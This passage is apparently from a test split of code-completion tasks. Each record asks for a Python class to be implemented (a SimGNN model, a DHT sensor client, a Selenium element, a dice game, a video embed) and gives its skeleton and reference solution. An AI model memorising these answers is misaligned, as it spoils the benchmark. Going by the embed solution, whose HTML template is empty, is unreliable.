:return hist: Histogram of similarity scores.", "name": "calculate_histogram", "signature": "def calculate_histogram(self, abstract_features_1, abstract_features_2)"}, {"docstring": "Making convolutional pass. :param edge_index: Edge indices. :param features: Feature matrix. :return features: Abstract feature matrix.", "name": "convolutional_pass", "signature": "def convolutional_pass(self, edge_index, features)"}, {"docstring": "Forward pass with graphs. :param data: Data dictionary. :return score: Similarity score.", "name": "forward", "signature": "def forward(self, data)"}], "n_methods": 6, "prompt": "Implement the Python class `SimGNN` described below.\n\nClass description:\nSimGNN: A Neural Network Approach to Fast Graph Similarity Computation https://arxiv.org/abs/1808.05689\n\nMethod signatures and docstrings:\n- def __init__(self, args, number_of_labels): :param args: Arguments object. :param number_of_labels: Number of node labels.\n- def calculate_bottleneck_features(self): Deciding the shape of the bottleneck layer.\n- def setup_layers(self): Creating the layers.\n- def calculate_histogram(self, abstract_features_1, abstract_features_2): Calculate histogram from similarity matrix. :param abstract_features_1: Feature matrix for graph 1. :param abstract_features_2: Feature matrix for graph 2. :return hist: Histogram of similarity scores.\n- def convolutional_pass(self, edge_index, features): Making convolutional pass. :param edge_index: Edge indices. :param features: Feature matrix. :return features: Abstract feature matrix.\n- def forward(self, data): Forward pass with graphs. :param data: Data dictionary. :return score: Similarity score.", "prompted_full_text": "Implement the Python class `SimGNN` described below.\n\nClass description:\nSimGNN: A Neural Network Approach to Fast Graph Similarity Computation https://arxiv.org/abs/1808.05689\n\nMethod signatures and docstrings:\n- def __init__(self, args, number_of_labels): :param args: Arguments object. :param number_of_labels: Number of node labels.\n- def calculate_bottleneck_features(self): Deciding the shape of the bottleneck layer.\n- def setup_layers(self): Creating the layers.\n- def calculate_histogram(self, abstract_features_1, abstract_features_2): Calculate histogram from similarity matrix. :param abstract_features_1: Feature matrix for graph 1. :param abstract_features_2: Feature matrix for graph 2. :return hist: Histogram of similarity scores.\n- def convolutional_pass(self, edge_index, features): Making convolutional pass. :param edge_index: Edge indices. :param features: Feature matrix. :return features: Abstract feature matrix.\n- def forward(self, data): Forward pass with graphs. :param data: Data dictionary. :return score: Similarity score.\n\n<|skeleton|>\nclass SimGNN:\n \"\"\"SimGNN: A Neural Network Approach to Fast Graph Similarity Computation https://arxiv.org/abs/1808.05689\"\"\"\n\n def __init__(self, args, number_of_labels):\n \"\"\":param args: Arguments object. :param number_of_labels: Number of node labels.\"\"\"\n <|body_0|>\n\n def calculate_bottleneck_features(self):\n \"\"\"Deciding the shape of the bottleneck layer.\"\"\"\n <|body_1|>\n\n def setup_layers(self):\n \"\"\"Creating the layers.\"\"\"\n <|body_2|>\n\n def calculate_histogram(self, abstract_features_1, abstract_features_2):\n \"\"\"Calculate histogram from similarity matrix. :param abstract_features_1: Feature matrix for graph 1. :param abstract_features_2: Feature matrix for graph 2. 
:return hist: Histogram of similarity scores.\"\"\"\n <|body_3|>\n\n def convolutional_pass(self, edge_index, features):\n \"\"\"Making convolutional pass. :param edge_index: Edge indices. :param features: Feature matrix. :return features: Abstract feature matrix.\"\"\"\n <|body_4|>\n\n def forward(self, data):\n \"\"\"Forward pass with graphs. :param data: Data dictionary. :return score: Similarity score.\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(SimGNN, self).__init__()\n self.args = args\n self.number_labels = number_of_labels\n self.setup_layers()\n<|end_body_0|>\n\n<|body_start_1|>\n if self.args.histogram == True:\n self.feature_count = self.args.tensor_neurons + self.args.bins\n else:\n self.feature_count = self.args.tensor_neurons\n<|end_body_1|>\n\n<|body_start_2|>\n self.calculate_bottleneck_features()\n self.convolution_1 = GCNConv(self.number_labels, self.args.filters_1)\n self.convolution_2 = GCNConv(self.args.filters_1, self.args.filters_2)\n self.convolution_3 = GCNConv(self.args.filters_2, self.args.filters_3)\n self.attention = AttentionModule(self.args)\n self.tensor_network = TenorNetworkModule(self.args)\n self.fully_connected_first = torch.nn.Linear(self.feature_count, self.args.bottle_neck_neurons)\n self.scoring_layer = torch.nn.Linear(self.args.bottle_neck_neurons, 1)\n<|end_body_2|>\n\n<|body_start_3|>\n scores = torch.mm(abstract_features_1, abstract_features_2).detach()\n scores = scores.view(-1, 1)\n hist = torch.histc(scores, bins=self.args.bins)\n hist = hist / torch.sum(hist)\n hist = hist.view(1, -1)\n return hist\n<|end_body_3|>\n\n<|body_start_4|>\n features = self.convolution_1(features, edge_index)\n features = torch.nn.functional.relu(features)\n features = torch.nn.functional.dropout(features, p=self.args.dropout, training=self.training)\n features = self.convolution_2(features, edge_index)\n features = torch.nn.functional.relu(features)\n features = torch.nn.functional.dropout(features, p=self.args.dropout, training=self.training)\n features = self.convolution_3(features, edge_index)\n return features\n<|end_body_4|>\n\n<|body_start_5|>\n edge_index_1 = data['edge_index_1']\n edge_index_2 = data['edge_index_2']\n features_1 = data['features_1']\n features_2 = data['features_2']\n abstract_features_1 = self.convolutional_pass(edge_index_1, features_1)\n abstract_features_2 = self.convolutional_pass(edge_index_2, features_2)\n if self.args.histogram == True:\n hist = self.calculate_histogram(abstract_features_1, torch.t(abstract_features_2))\n pooled_features_1 = self.attention(abstract_features_1)\n pooled_features_2 = self.attention(abstract_features_2)\n scores = self.tensor_network(pooled_features_1, pooled_features_2)\n scores = torch.t(scores)\n if self.args.histogram == True:\n scores = torch.cat((scores, hist), dim=1).view(1, -1)\n scores = torch.nn.functional.relu(self.fully_connected_first(scores))\n score = torch.sigmoid(self.scoring_layer(scores))\n return score\n<|end_body_5|>\n", "revision_id": "7e55a422588c1d1e00f35a3d3a3ff896cce59e18", "skeleton": "<|skeleton|>\nclass SimGNN:\n \"\"\"SimGNN: A Neural Network Approach to Fast Graph Similarity Computation https://arxiv.org/abs/1808.05689\"\"\"\n\n def __init__(self, args, number_of_labels):\n \"\"\":param args: Arguments object. 
:param number_of_labels: Number of node labels.\"\"\"\n <|body_0|>\n\n def calculate_bottleneck_features(self):\n \"\"\"Deciding the shape of the bottleneck layer.\"\"\"\n <|body_1|>\n\n def setup_layers(self):\n \"\"\"Creating the layers.\"\"\"\n <|body_2|>\n\n def calculate_histogram(self, abstract_features_1, abstract_features_2):\n \"\"\"Calculate histogram from similarity matrix. :param abstract_features_1: Feature matrix for graph 1. :param abstract_features_2: Feature matrix for graph 2. :return hist: Histogram of similarity scores.\"\"\"\n <|body_3|>\n\n def convolutional_pass(self, edge_index, features):\n \"\"\"Making convolutional pass. :param edge_index: Edge indices. :param features: Feature matrix. :return features: Abstract feature matrix.\"\"\"\n <|body_4|>\n\n def forward(self, data):\n \"\"\"Forward pass with graphs. :param data: Data dictionary. :return score: Similarity score.\"\"\"\n <|body_5|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SimGNN:\n \"\"\"SimGNN: A Neural Network Approach to Fast Graph Similarity Computation https://arxiv.org/abs/1808.05689\"\"\"\n\n def __init__(self, args, number_of_labels):\n \"\"\":param args: Arguments object. :param number_of_labels: Number of node labels.\"\"\"\n super(SimGNN, self).__init__()\n self.args = args\n self.number_labels = number_of_labels\n self.setup_layers()\n\n def calculate_bottleneck_features(self):\n \"\"\"Deciding the shape of the bottleneck layer.\"\"\"\n if self.args.histogram == True:\n self.feature_count = self.args.tensor_neurons + self.args.bins\n else:\n self.feature_count = self.args.tensor_neurons\n\n def setup_layers(self):\n \"\"\"Creating the layers.\"\"\"\n self.calculate_bottleneck_features()\n self.convolution_1 = GCNConv(self.number_labels, self.args.filters_1)\n self.convolution_2 = GCNConv(self.args.filters_1, self.args.filters_2)\n self.convolution_3 = GCNConv(self.args.filters_2, self.args.filters_3)\n self.attention = AttentionModule(self.args)\n self.tensor_network = TenorNetworkModule(self.args)\n self.fully_connected_first = torch.nn.Linear(self.feature_count, self.args.bottle_neck_neurons)\n self.scoring_layer = torch.nn.Linear(self.args.bottle_neck_neurons, 1)\n\n def calculate_histogram(self, abstract_features_1, abstract_features_2):\n \"\"\"Calculate histogram from similarity matrix. :param abstract_features_1: Feature matrix for graph 1. :param abstract_features_2: Feature matrix for graph 2. :return hist: Histogram of similarity scores.\"\"\"\n scores = torch.mm(abstract_features_1, abstract_features_2).detach()\n scores = scores.view(-1, 1)\n hist = torch.histc(scores, bins=self.args.bins)\n hist = hist / torch.sum(hist)\n hist = hist.view(1, -1)\n return hist\n\n def convolutional_pass(self, edge_index, features):\n \"\"\"Making convolutional pass. :param edge_index: Edge indices. :param features: Feature matrix. 
:return features: Abstract feature matrix.\"\"\"\n features = self.convolution_1(features, edge_index)\n features = torch.nn.functional.relu(features)\n features = torch.nn.functional.dropout(features, p=self.args.dropout, training=self.training)\n features = self.convolution_2(features, edge_index)\n features = torch.nn.functional.relu(features)\n features = torch.nn.functional.dropout(features, p=self.args.dropout, training=self.training)\n features = self.convolution_3(features, edge_index)\n return features\n\n def forward(self, data):\n \"\"\"Forward pass with graphs. :param data: Data dictionary. :return score: Similarity score.\"\"\"\n edge_index_1 = data['edge_index_1']\n edge_index_2 = data['edge_index_2']\n features_1 = data['features_1']\n features_2 = data['features_2']\n abstract_features_1 = self.convolutional_pass(edge_index_1, features_1)\n abstract_features_2 = self.convolutional_pass(edge_index_2, features_2)\n if self.args.histogram == True:\n hist = self.calculate_histogram(abstract_features_1, torch.t(abstract_features_2))\n pooled_features_1 = self.attention(abstract_features_1)\n pooled_features_2 = self.attention(abstract_features_2)\n scores = self.tensor_network(pooled_features_1, pooled_features_2)\n scores = torch.t(scores)\n if self.args.histogram == True:\n scores = torch.cat((scores, hist), dim=1).view(1, -1)\n scores = torch.nn.functional.relu(self.fully_connected_first(scores))\n score = torch.sigmoid(self.scoring_layer(scores))\n return score\n", "source": "the_stack_v2_python_sparse", "source_path": "generated/test_benedekrozemberczki_SimGNN.py", "source_repo": "jansel/pytorch-jit-paritybench", "split": "test", "star_events_count": 35} {"blob_id": "91bc824fbc850b3a8d04607956fc21673b175379", "bodies": ["self.sensor = sensor\nself.pin = getattr(board, pin)\nself.data = {}\nself.name = name", "dht = self.sensor(self.pin)\ntry:\n temperature = dht.temperature\n humidity = dht.humidity\nexcept RuntimeError:\n _LOGGER.debug('Unexpected value from DHT sensor: %s', self.name)\nexcept Exception:\n _LOGGER.exception('Error updating DHT sensor: %s', self.name)\nelse:\n if temperature:\n self.data[SENSOR_TEMPERATURE] = temperature\n if humidity:\n self.data[SENSOR_HUMIDITY] = humidity\nfinally:\n dht.exit()"], "bodies_text": "<|body_start_0|>\n self.sensor = sensor\n self.pin = getattr(board, pin)\n self.data = {}\n self.name = name\n<|end_body_0|>\n\n<|body_start_1|>\n dht = self.sensor(self.pin)\n try:\n temperature = dht.temperature\n humidity = dht.humidity\n except RuntimeError:\n _LOGGER.debug('Unexpected value from DHT sensor: %s', self.name)\n except Exception:\n _LOGGER.exception('Error updating DHT sensor: %s', self.name)\n else:\n if temperature:\n self.data[SENSOR_TEMPERATURE] = temperature\n if humidity:\n self.data[SENSOR_HUMIDITY] = humidity\n finally:\n dht.exit()\n<|end_body_1|>\n", "class_docstring": "Get the latest data from the DHT sensor.", "class_name": "DHTClient", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DHTClient:\n \"\"\"Get the latest data from the DHT sensor.\"\"\"\n\n def __init__(self, sensor, pin, name):\n \"\"\"Initialize the sensor.\"\"\"\n <|body_0|>\n\n def update(self):\n \"\"\"Get the latest data from the DHT sensor.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.sensor = sensor\n self.pin = getattr(board, pin)\n self.data = {}\n self.name = name\n<|end_body_0|>\n\n<|body_start_1|>\n dht = self.sensor(self.pin)\n try:\n temperature 
= dht.temperature\n humidity = dht.humidity\n except RuntimeError:\n _LOGGER.debug('Unexpected value from DHT sensor: %s', self.name)\n except Exception:\n _LOGGER.exception('Error updating DHT sensor: %s', self.name)\n else:\n if temperature:\n self.data[SENSOR_TEMPERATURE] = temperature\n if humidity:\n self.data[SENSOR_HUMIDITY] = humidity\n finally:\n dht.exit()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000338", "length_bytes": 5733, "license_type": "permissive", "methods": [{"docstring": "Initialize the sensor.", "name": "__init__", "signature": "def __init__(self, sensor, pin, name)"}, {"docstring": "Get the latest data from the DHT sensor.", "name": "update", "signature": "def update(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003833", "prompt": "Implement the Python class `DHTClient` described below.\n\nClass description:\nGet the latest data from the DHT sensor.\n\nMethod signatures and docstrings:\n- def __init__(self, sensor, pin, name): Initialize the sensor.\n- def update(self): Get the latest data from the DHT sensor.", "prompted_full_text": "Implement the Python class `DHTClient` described below.\n\nClass description:\nGet the latest data from the DHT sensor.\n\nMethod signatures and docstrings:\n- def __init__(self, sensor, pin, name): Initialize the sensor.\n- def update(self): Get the latest data from the DHT sensor.\n\n<|skeleton|>\nclass DHTClient:\n \"\"\"Get the latest data from the DHT sensor.\"\"\"\n\n def __init__(self, sensor, pin, name):\n \"\"\"Initialize the sensor.\"\"\"\n <|body_0|>\n\n def update(self):\n \"\"\"Get the latest data from the DHT sensor.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.sensor = sensor\n self.pin = getattr(board, pin)\n self.data = {}\n self.name = name\n<|end_body_0|>\n\n<|body_start_1|>\n dht = self.sensor(self.pin)\n try:\n temperature = dht.temperature\n humidity = dht.humidity\n except RuntimeError:\n _LOGGER.debug('Unexpected value from DHT sensor: %s', self.name)\n except Exception:\n _LOGGER.exception('Error updating DHT sensor: %s', self.name)\n else:\n if temperature:\n self.data[SENSOR_TEMPERATURE] = temperature\n if humidity:\n self.data[SENSOR_HUMIDITY] = humidity\n finally:\n dht.exit()\n<|end_body_1|>\n", "revision_id": "8de7966104911bca6f855a1755a6d71a07afb9de", "skeleton": "<|skeleton|>\nclass DHTClient:\n \"\"\"Get the latest data from the DHT sensor.\"\"\"\n\n def __init__(self, sensor, pin, name):\n \"\"\"Initialize the sensor.\"\"\"\n <|body_0|>\n\n def update(self):\n \"\"\"Get the latest data from the DHT sensor.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DHTClient:\n \"\"\"Get the latest data from the DHT sensor.\"\"\"\n\n def __init__(self, sensor, pin, name):\n \"\"\"Initialize the sensor.\"\"\"\n self.sensor = sensor\n self.pin = getattr(board, pin)\n self.data = {}\n self.name = name\n\n def update(self):\n \"\"\"Get the latest data from the DHT sensor.\"\"\"\n dht = self.sensor(self.pin)\n try:\n temperature = dht.temperature\n humidity = dht.humidity\n except RuntimeError:\n _LOGGER.debug('Unexpected value from DHT sensor: %s', self.name)\n except Exception:\n _LOGGER.exception('Error updating DHT sensor: %s', self.name)\n else:\n if temperature:\n self.data[SENSOR_TEMPERATURE] = temperature\n if humidity:\n self.data[SENSOR_HUMIDITY] = humidity\n finally:\n dht.exit()\n", "source": "the_stack_v2_python_sparse", "source_path": 
"homeassistant/components/dht/sensor.py", "source_repo": "AlexxIT/home-assistant", "split": "test", "star_events_count": 9} {"blob_id": "471c02e0b1c3c61658bf1b20b8b9e89c69aba3a2", "bodies": ["driver = obj.driver\nif self.locator[0] != 'css selector':\n raise 'Using a locator other than css'\nWebDriverWait(driver, 100).until(lambda driver: driver.find_element_by_css_selector(self.locator[1]))\ndriver.find_element_by_css_selector(self.locator[1]).send_keys(value)", "driver = obj.driver\nif self.locator[0] != 'css selector':\n raise 'Using a locator other than css'\nWebDriverWait(driver, 100).until(lambda driver: driver.find_element_by_css_selector(self.locator[1]))\nelement = driver.find_element_by_css_selector(self.locator[1])\nreturn element.get_attribute('value')"], "bodies_text": "<|body_start_0|>\n driver = obj.driver\n if self.locator[0] != 'css selector':\n raise 'Using a locator other than css'\n WebDriverWait(driver, 100).until(lambda driver: driver.find_element_by_css_selector(self.locator[1]))\n driver.find_element_by_css_selector(self.locator[1]).send_keys(value)\n<|end_body_0|>\n\n<|body_start_1|>\n driver = obj.driver\n if self.locator[0] != 'css selector':\n raise 'Using a locator other than css'\n WebDriverWait(driver, 100).until(lambda driver: driver.find_element_by_css_selector(self.locator[1]))\n element = driver.find_element_by_css_selector(self.locator[1])\n return element.get_attribute('value')\n<|end_body_1|>\n", "class_docstring": "Base page class that is initialized on every page object class.", "class_name": "BasePageElement", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BasePageElement:\n \"\"\"Base page class that is initialized on every page object class.\"\"\"\n\n def __set__(self, obj, value):\n \"\"\"Sets the text to the value supplied\"\"\"\n <|body_0|>\n\n def __get__(self, obj, owner):\n \"\"\"Gets the text of the specified object\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n driver = obj.driver\n if self.locator[0] != 'css selector':\n raise 'Using a locator other than css'\n WebDriverWait(driver, 100).until(lambda driver: driver.find_element_by_css_selector(self.locator[1]))\n driver.find_element_by_css_selector(self.locator[1]).send_keys(value)\n<|end_body_0|>\n\n<|body_start_1|>\n driver = obj.driver\n if self.locator[0] != 'css selector':\n raise 'Using a locator other than css'\n WebDriverWait(driver, 100).until(lambda driver: driver.find_element_by_css_selector(self.locator[1]))\n element = driver.find_element_by_css_selector(self.locator[1])\n return element.get_attribute('value')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000339", "length_bytes": 1105, "license_type": "no_license", "methods": [{"docstring": "Sets the text to the value supplied", "name": "__set__", "signature": "def __set__(self, obj, value)"}, {"docstring": "Gets the text of the specified object", "name": "__get__", "signature": "def __get__(self, obj, owner)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_007355", "prompt": "Implement the Python class `BasePageElement` described below.\n\nClass description:\nBase page class that is initialized on every page object class.\n\nMethod signatures and docstrings:\n- def __set__(self, obj, value): Sets the text to the value supplied\n- def __get__(self, obj, owner): Gets the text of the specified object", "prompted_full_text": "Implement the Python class `BasePageElement` described below.\n\nClass description:\nBase 
page class that is initialized on every page object class.\n\nMethod signatures and docstrings:\n- def __set__(self, obj, value): Sets the text to the value supplied\n- def __get__(self, obj, owner): Gets the text of the specified object\n\n<|skeleton|>\nclass BasePageElement:\n \"\"\"Base page class that is initialized on every page object class.\"\"\"\n\n def __set__(self, obj, value):\n \"\"\"Sets the text to the value supplied\"\"\"\n <|body_0|>\n\n def __get__(self, obj, owner):\n \"\"\"Gets the text of the specified object\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n driver = obj.driver\n if self.locator[0] != 'css selector':\n raise 'Using a locator other than css'\n WebDriverWait(driver, 100).until(lambda driver: driver.find_element_by_css_selector(self.locator[1]))\n driver.find_element_by_css_selector(self.locator[1]).send_keys(value)\n<|end_body_0|>\n\n<|body_start_1|>\n driver = obj.driver\n if self.locator[0] != 'css selector':\n raise 'Using a locator other than css'\n WebDriverWait(driver, 100).until(lambda driver: driver.find_element_by_css_selector(self.locator[1]))\n element = driver.find_element_by_css_selector(self.locator[1])\n return element.get_attribute('value')\n<|end_body_1|>\n", "revision_id": "43ab187a9bca4c56d6005a46725c56f39949fceb", "skeleton": "<|skeleton|>\nclass BasePageElement:\n \"\"\"Base page class that is initialized on every page object class.\"\"\"\n\n def __set__(self, obj, value):\n \"\"\"Sets the text to the value supplied\"\"\"\n <|body_0|>\n\n def __get__(self, obj, owner):\n \"\"\"Gets the text of the specified object\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BasePageElement:\n \"\"\"Base page class that is initialized on every page object class.\"\"\"\n\n def __set__(self, obj, value):\n \"\"\"Sets the text to the value supplied\"\"\"\n driver = obj.driver\n if self.locator[0] != 'css selector':\n raise 'Using a locator other than css'\n WebDriverWait(driver, 100).until(lambda driver: driver.find_element_by_css_selector(self.locator[1]))\n driver.find_element_by_css_selector(self.locator[1]).send_keys(value)\n\n def __get__(self, obj, owner):\n \"\"\"Gets the text of the specified object\"\"\"\n driver = obj.driver\n if self.locator[0] != 'css selector':\n raise 'Using a locator other than css'\n WebDriverWait(driver, 100).until(lambda driver: driver.find_element_by_css_selector(self.locator[1]))\n element = driver.find_element_by_css_selector(self.locator[1])\n return element.get_attribute('value')\n", "source": "the_stack_v2_python_sparse", "source_path": "skynet/driver/base_page_element.py", "source_repo": "bsterrett/ye_olde_skynet", "split": "test", "star_events_count": 3} {"blob_id": "2aedc91471a6a83ed9ded18e3bb939363b892580", "bodies": ["self.pair = PairOfDice()\nself.point = None\nself.origin_point = None", "input('Please enter to roll the dice...\\n')\nself.pair.roll_dice()\nself.point = self.pair.current_value()", "WIN_POINTS = [7, 11]\nLOSE_POINTS = [2, 3, 12]\nif self.point in LOSE_POINTS:\n print('You rolled {}. You lose.'.format(self.point))\nelif self.point in WIN_POINTS:\n print('You rolled {}. 
You win.'.format(self.point))\nelse:\n print('You point is {}'.format(self.point))\n self.origin_point = self.point\n self.continue_game()", "LOSE_POINT = 7\nself.start_play()\nwhile self.point != self.origin_point and self.point != LOSE_POINT:\n print('You rolled {}.'.format(self.point))\n self.start_play()\nelse:\n if self.point == self.origin_point:\n print('You rolled {}. You win.'.format(self.point))\n else:\n print('You rolled {}. You lose.'.format(self.point))"], "bodies_text": "<|body_start_0|>\n self.pair = PairOfDice()\n self.point = None\n self.origin_point = None\n<|end_body_0|>\n\n<|body_start_1|>\n input('Please enter to roll the dice...\\n')\n self.pair.roll_dice()\n self.point = self.pair.current_value()\n<|end_body_1|>\n\n<|body_start_2|>\n WIN_POINTS = [7, 11]\n LOSE_POINTS = [2, 3, 12]\n if self.point in LOSE_POINTS:\n print('You rolled {}. You lose.'.format(self.point))\n elif self.point in WIN_POINTS:\n print('You rolled {}. You win.'.format(self.point))\n else:\n print('You point is {}'.format(self.point))\n self.origin_point = self.point\n self.continue_game()\n<|end_body_2|>\n\n<|body_start_3|>\n LOSE_POINT = 7\n self.start_play()\n while self.point != self.origin_point and self.point != LOSE_POINT:\n print('You rolled {}.'.format(self.point))\n self.start_play()\n else:\n if self.point == self.origin_point:\n print('You rolled {}. You win.'.format(self.point))\n else:\n print('You rolled {}. You lose.'.format(self.point))\n<|end_body_3|>\n", "class_docstring": "", "class_name": "GameController", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass GameController:\n\n def __init__(self):\n \"\"\"creat a PairOfDice() object, initialize the point and score value\"\"\"\n <|body_0|>\n\n def start_play(self):\n \"\"\"Start to play the game, roll the dice and get current value\"\"\"\n <|body_1|>\n\n def show_result(self):\n \"\"\"get the result based on the rules\"\"\"\n <|body_2|>\n\n def continue_game(self):\n \"\"\"didn't get the result, continue to play, compare the point with the origin_point\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.pair = PairOfDice()\n self.point = None\n self.origin_point = None\n<|end_body_0|>\n\n<|body_start_1|>\n input('Please enter to roll the dice...\\n')\n self.pair.roll_dice()\n self.point = self.pair.current_value()\n<|end_body_1|>\n\n<|body_start_2|>\n WIN_POINTS = [7, 11]\n LOSE_POINTS = [2, 3, 12]\n if self.point in LOSE_POINTS:\n print('You rolled {}. You lose.'.format(self.point))\n elif self.point in WIN_POINTS:\n print('You rolled {}. You win.'.format(self.point))\n else:\n print('You point is {}'.format(self.point))\n self.origin_point = self.point\n self.continue_game()\n<|end_body_2|>\n\n<|body_start_3|>\n LOSE_POINT = 7\n self.start_play()\n while self.point != self.origin_point and self.point != LOSE_POINT:\n print('You rolled {}.'.format(self.point))\n self.start_play()\n else:\n if self.point == self.origin_point:\n print('You rolled {}. You win.'.format(self.point))\n else:\n print('You rolled {}. 
You lose.'.format(self.point))\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000340", "length_bytes": 1536, "license_type": "no_license", "methods": [{"docstring": "creat a PairOfDice() object, initialize the point and score value", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "Start to play the game, roll the dice and get current value", "name": "start_play", "signature": "def start_play(self)"}, {"docstring": "get the result based on the rules", "name": "show_result", "signature": "def show_result(self)"}, {"docstring": "didn't get the result, continue to play, compare the point with the origin_point", "name": "continue_game", "signature": "def continue_game(self)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_004668", "prompt": "Implement the Python class `GameController` described below.\n\nClass description:\nImplement the GameController class.\n\nMethod signatures and docstrings:\n- def __init__(self): creat a PairOfDice() object, initialize the point and score value\n- def start_play(self): Start to play the game, roll the dice and get current value\n- def show_result(self): get the result based on the rules\n- def continue_game(self): didn't get the result, continue to play, compare the point with the origin_point", "prompted_full_text": "Implement the Python class `GameController` described below.\n\nClass description:\nImplement the GameController class.\n\nMethod signatures and docstrings:\n- def __init__(self): creat a PairOfDice() object, initialize the point and score value\n- def start_play(self): Start to play the game, roll the dice and get current value\n- def show_result(self): get the result based on the rules\n- def continue_game(self): didn't get the result, continue to play, compare the point with the origin_point\n\n<|skeleton|>\nclass GameController:\n\n def __init__(self):\n \"\"\"creat a PairOfDice() object, initialize the point and score value\"\"\"\n <|body_0|>\n\n def start_play(self):\n \"\"\"Start to play the game, roll the dice and get current value\"\"\"\n <|body_1|>\n\n def show_result(self):\n \"\"\"get the result based on the rules\"\"\"\n <|body_2|>\n\n def continue_game(self):\n \"\"\"didn't get the result, continue to play, compare the point with the origin_point\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.pair = PairOfDice()\n self.point = None\n self.origin_point = None\n<|end_body_0|>\n\n<|body_start_1|>\n input('Please enter to roll the dice...\\n')\n self.pair.roll_dice()\n self.point = self.pair.current_value()\n<|end_body_1|>\n\n<|body_start_2|>\n WIN_POINTS = [7, 11]\n LOSE_POINTS = [2, 3, 12]\n if self.point in LOSE_POINTS:\n print('You rolled {}. You lose.'.format(self.point))\n elif self.point in WIN_POINTS:\n print('You rolled {}. You win.'.format(self.point))\n else:\n print('You point is {}'.format(self.point))\n self.origin_point = self.point\n self.continue_game()\n<|end_body_2|>\n\n<|body_start_3|>\n LOSE_POINT = 7\n self.start_play()\n while self.point != self.origin_point and self.point != LOSE_POINT:\n print('You rolled {}.'.format(self.point))\n self.start_play()\n else:\n if self.point == self.origin_point:\n print('You rolled {}. You win.'.format(self.point))\n else:\n print('You rolled {}. 
You lose.'.format(self.point))\n<|end_body_3|>\n", "revision_id": "346b4637a162eba17f2ab8e4d95b23b615300c4b", "skeleton": "<|skeleton|>\nclass GameController:\n\n def __init__(self):\n \"\"\"creat a PairOfDice() object, initialize the point and score value\"\"\"\n <|body_0|>\n\n def start_play(self):\n \"\"\"Start to play the game, roll the dice and get current value\"\"\"\n <|body_1|>\n\n def show_result(self):\n \"\"\"get the result based on the rules\"\"\"\n <|body_2|>\n\n def continue_game(self):\n \"\"\"didn't get the result, continue to play, compare the point with the origin_point\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class GameController:\n def __init__(self):\n \"\"\"creat a PairOfDice() object, initialize the point and score value\"\"\"\n self.pair = PairOfDice()\n self.point = None\n self.origin_point = None\n\n def start_play(self):\n \"\"\"Start to play the game, roll the dice and get current value\"\"\"\n input('Please enter to roll the dice...\\n')\n self.pair.roll_dice()\n self.point = self.pair.current_value()\n\n def show_result(self):\n \"\"\"get the result based on the rules\"\"\"\n WIN_POINTS = [7, 11]\n LOSE_POINTS = [2, 3, 12]\n if self.point in LOSE_POINTS:\n print('You rolled {}. You lose.'.format(self.point))\n elif self.point in WIN_POINTS:\n print('You rolled {}. You win.'.format(self.point))\n else:\n print('You point is {}'.format(self.point))\n self.origin_point = self.point\n self.continue_game()\n\n def continue_game(self):\n \"\"\"didn't get the result, continue to play, compare the point with the origin_point\"\"\"\n LOSE_POINT = 7\n self.start_play()\n while self.point != self.origin_point and self.point != LOSE_POINT:\n print('You rolled {}.'.format(self.point))\n self.start_play()\n else:\n if self.point == self.origin_point:\n print('You rolled {}. You win.'.format(self.point))\n else:\n print('You rolled {}. 
You lose.'.format(self.point))\n", "source": "the_stack_v2_python_sparse", "source_path": "lab07/game_controller.py", "source_repo": "jingjingliao/PythonCourse_5001", "split": "test", "star_events_count": 0} {"blob_id": "03d529ce12700fdafae2f792bb8b44968fe53cab", "bodies": ["embed_url = None\nyoutube_embed_url = 'https://www.youtube.com/embed/{}'\nvimeo_embed_url = 'https://player.vimeo.com/video/{}'\nif re.match(YOUTUBE_URL_RE, self.url):\n embed_url = youtube_embed_url.format(re.match(YOUTUBE_URL_RE, self.url).group(2))\nif re.match(VIMEO_URL_RE, self.url):\n embed_url = vimeo_embed_url.format(re.match(VIMEO_URL_RE, self.url).group(3))\nreturn embed_url", "if self.url:\n iframe_html = ''\n self.html = iframe_html.format(self.get_embed_url(), self.title)\nreturn super().save(force_insert, force_update, using, update_fields)"], "bodies_text": "<|body_start_0|>\n embed_url = None\n youtube_embed_url = 'https://www.youtube.com/embed/{}'\n vimeo_embed_url = 'https://player.vimeo.com/video/{}'\n if re.match(YOUTUBE_URL_RE, self.url):\n embed_url = youtube_embed_url.format(re.match(YOUTUBE_URL_RE, self.url).group(2))\n if re.match(VIMEO_URL_RE, self.url):\n embed_url = vimeo_embed_url.format(re.match(VIMEO_URL_RE, self.url).group(3))\n return embed_url\n<|end_body_0|>\n\n<|body_start_1|>\n if self.url:\n iframe_html = ''\n self.html = iframe_html.format(self.get_embed_url(), self.title)\n return 